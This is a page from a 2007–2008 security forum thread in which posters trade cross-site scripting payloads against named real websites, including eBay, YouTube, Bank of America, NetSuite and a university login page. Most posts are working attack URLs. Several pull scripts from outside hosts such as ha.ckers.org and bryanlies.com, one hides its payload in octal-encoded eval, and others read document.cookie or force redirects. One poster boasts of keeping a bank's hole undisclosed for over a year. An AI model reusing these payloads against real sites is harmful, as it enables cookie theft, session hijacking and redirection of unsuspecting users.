Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5051525354555657585960...LastNext
Current Page: 55 of 65
Re: So it begins
Posted by: nemessis
Date: December 06, 2007 11:37PM

This is a better formula Fugitif :)

hxxp://togo.ebay.com/app/auctionfinder.php?query=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&page&seller&category=&TZ=-120&block=list

Options: ReplyQuote
Re: So it begins
Posted by: timoleary71
Date: December 08, 2007 02:27AM

www.teachertube.com

Nothing is checked. I can insert into picture URL, video comment, Firstname/ lastname, etc
click on first video:

hxxp://www.teachertube.com/view_video.php?viewkey=e6d0b40c72b279ebdf76



www.clipshare.com < clipshare software.
Login- Goto Send a message.
send a message with subject & body of:
>"><script>location="hxxp://www.geocities.com/timoleary71/"</script>
if the person tries to open there inbox, they don't even need to click on the message they get auto-redirected.. Also, you can put it inside the "Location Recorded" field of a video upload. Anytime someone tries to view the video...



Edited 3 time(s). Last edit at 12/08/2007 02:48AM by timoleary71.

Options: ReplyQuote
Re: So it begins
Posted by: timoleary71
Date: December 08, 2007 03:25PM

Injection...


http://www.paxpartnership.org/calendar/index.cfm?fuseaction=ViewEventDetails&EventID=1
Inject into EventID...

Options: ReplyQuote
Re: Another ones
Posted by: iota
Date: December 14, 2007 08:56AM


Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: December 16, 2007 12:35PM

hxxp://www.engadget.com/search/?q=test''\"onmouseover='alert(0)'style='position:absolute;top:-500px;left:-5000px;width:100000px;height:10000px;z-index:99999;'onerror="

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: December 20, 2007 01:02AM

This site is well guarded against XSS in every form and parameter.. but they didn't make sure to filter arbitrary parameter names

http://my.convio.com/?elqPURLPage=7&notaparameter=--%3E%3C/script%20v=b%3E%3Cscript%20src=%22http://ha.ckers.org/s%22%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: December 20, 2007 01:07AM

my uni https://cs7000a.uta.edu/logon?--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!--a

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: December 30, 2007 02:47PM

This was vaguely difficult to find due to some XSS protection in place, some browser dependencies and some unreliable server issues. This company just went public (sounds like a good company too, I might add). The URL is HTTPS, making it slightly more interesting (the XSS exploit works only in IE and pops up infinite alerts as long as your mouse is over the body of the page):

https://system.netsuite.com/pages/pwdreset.jsp?email=shopper%40nlcorp.com&answer1="style="width:expression(alert(document.cookie))&answer2=&answer3=&submitter=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: January 03, 2008 02:26AM

This is top Malaysia newspaper.

http://www.utusan.com.my/utusan/keyword_search.asp?NewString=<script>alert(1)</script>

a simple straight forward!!

krazl
www.krazl.com

http://www.krazl.com

Options: ReplyQuote
Re: So it begins
Posted by: gerry
Date: January 04, 2008 03:24PM

http://www.stumbleupon.com/create_campaign.php?url=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cx=%22
http://www.youtube.com/comment_servlet?all_comments&v=IoXgRtDysLY&fromurl=%2f%2522%253E%253C/a%253E%253Cscript%253Ealert(1)%3b%253C/script%253E%253Cx=%2522

-g
[hiredhacker.com]

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: January 05, 2008 10:08AM

Very nice, gerry!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: gerry
Date: January 05, 2008 03:04PM

Thanks. Heres one for ebay too

http://pages.ebay.com/help/policies/index.html?fromFeature=Advanced%20Search%3C/a%3E%3CSCRIPT/**/SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E

It requires the user to have already visited ebay, or for the request to be reloaded as it is only displayed when there is a history. I need to look at the logic more to see it can be worked around, but figured if someone is interested they can do it ;)

-g
[hiredhacker.com]

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: January 05, 2008 05:56PM

hxxp://www.youtube.com/my_profile_organize?type="><script>alert("You%20must%20to%20be%20logged%20in%20to%20see%20this%20alert")</script>&user=Nemessis

You need to be logged in your youtube account.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Options: ReplyQuote
Re: So it begins
Posted by: apnovi
Date: January 08, 2008 05:10AM

http://www.biguard.com/reg_emailverify.php?sn=1&e=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: January 08, 2008 05:41PM

http://www.gamefly.com/products/search.asp?k=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp&pf=&sub=1&sb=mostpop&spsrch.x=0&spsrch.y=0
https://www.gamefly.com/member/reg0.asp?tp=&re=/member/account.asp?&pr=&p=0&gcid=&gctp=0&pue=&fc=&un=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&pw=&forgotpw=0&submit.x=0&submit.y=0
I was only here because I wanted to sign up for an account... but not anymore: http://www.gamefly.com/products/search.asp?k=&pf=0&cat=2&sb=mostpop&pg=1&letter='&s=&t=0&next.x=29&next.y=8

EDIT: Didn't feel like making a new post:
http://tell-a-friend-wizard.com/cgi-bin/tell_opt_gold.cgi?uid=%22%3E%3Cscript%3Ealert%28%27xss1%27%29%3C/script%3E&url=%22%3E%3Cscript%3Ealert%28%27xss2%27%29%3C/script%3E&captcha=%22%3E%3Cscript%3Ealert%28%27xss3%27%29%3C/script%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/10/2008 05:16PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: January 14, 2008 01:19PM

Wanna go shopping? Just mouse over the search box.

http://walmart.ca/wps-portal/storelocator/Canada-FeaturedPage.jsp?selection=listing&tabId=22&&&categoryId=582&currentPage=5&departmentId=17&lang=&searchQuery=%22%20onmousemove=%22alert(1)%22%20size=%221&tabId=22

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: January 14, 2008 01:42PM

Identity theft protection:
https://www.selectidtheftprotection.com/scripts/externalpromo.asp?ref=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: January 14, 2008 10:23PM

Is it possible to put goverment website here? Let me know rsnake...

krazl
www.krazl.com

http://www.krazl.com

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: January 15, 2008 02:26PM

There are several in this thread, go ahead.

-id

Options: ReplyQuote
Re: So it begins
Posted by: Jiu
Date: January 18, 2008 12:10PM

ch.tillate.com (dunno if that works on other country)

send message

Title: ')" onmouseover=alert(1); o

Works on firefox, didn't try on IE ^^

Options: ReplyQuote
Re: So it begins
Posted by: gerry
Date: January 19, 2008 03:51PM


Options: ReplyQuote
Re: So it begins
Posted by: gerry
Date: January 20, 2008 06:59PM

[www.nfl.com]
[www.nfl.com]
[www.patriots.com]
[www.patriots.com]

-g
[hiredhacker.com]



Edited 1 time(s). Last edit at 01/20/2008 07:01PM by gerry.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: January 31, 2008 03:15PM

remove all spaces and replace all e by m which avoids Eval, iframE, String.fromCharCode, etc. etc.
Is this save? You all know ...

Quote

http://verivox.de/Power/Calculator.asp?31=on&No=40&51=on&52=on&54=on&lookup=true&leistungsmessung=no&radio1=1&plz=01234&11=31337%22onfocus=%22top['\145\166\141\154']('\144\157\143\165\155\145\156\164\56\167\162\151\164\145\154\156\50\47\74\142\157\144\171\76\74\163\143\162\151\160\164\40\163\162\143\75\42\57\57\150\141\56\143\153\145\162\163\56\157\162\147\57\163\42\76\74\57\163\143\162\151\160\164\76\74\57\142\157\144\171\76\47\51\73');&customer=priv&submit1=vergleichen

(uses onfocus)

Lesson learned: forget about any sanitation;-)

--
Edit: ubb's url tag is too stupid for sophisticated links:-/



Edited 1 time(s). Last edit at 02/01/2008 04:26AM by kirke.

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: February 02, 2008 06:29PM

hxxp://www.archive.org/search.php?query=%22%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
It's actually interesting that i had to put the " first, otherwise it would have remove every <
Some filters are actually strange :/

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/02/2008 06:30PM by nEUrOO.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 08, 2008 01:37PM

This is for that crappy article: http://comments.cio.com/node/176250?page=%22%3Balert%28%27xss%27%29%3B//

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: February 08, 2008 01:48PM

--Deleted by request--



Edited 4 time(s). Last edit at 07/01/2010 10:04AM by rsnake.

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: February 08, 2008 02:47PM

@tx

Hehe I like it nice1 :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 11, 2008 04:07PM

XSS via their open redirect page:
http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=javascript%3Aalert%28document.domain%29%22onmouseover%3D%22alert%28document.cookie%29

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: February 11, 2008 09:13PM

http://h-date.com/login.jsp?login=%22%3E%3Cscript%20src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&password=&Submit=Login
^ dont ask...

http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/';alert(document.cookie);%3C/script%3E/PBLogo.166.BG.white.gif&searchTerm=&pageOffset=1
http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/PBLogo.166.BG.white.gif&searchTerm=%22%3E%3Cscript/src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&pageOffset=1

oh, and hi.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:05AM

http://www.bankofamerica.com/state.cgi?section=contact&update=yes&cookiecheck=yes&lob=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20k

This has been live and undisclosed for atleast over a year that i've had it saved.. still works ^^
I no longer have a BoA account to use it further, however.

-maluc

Options: ReplyQuote
Pages: PreviousFirst...5051525354555657585960...LastNext
Current Page: 55 of 65


Sorry, only registered users may post in this forum.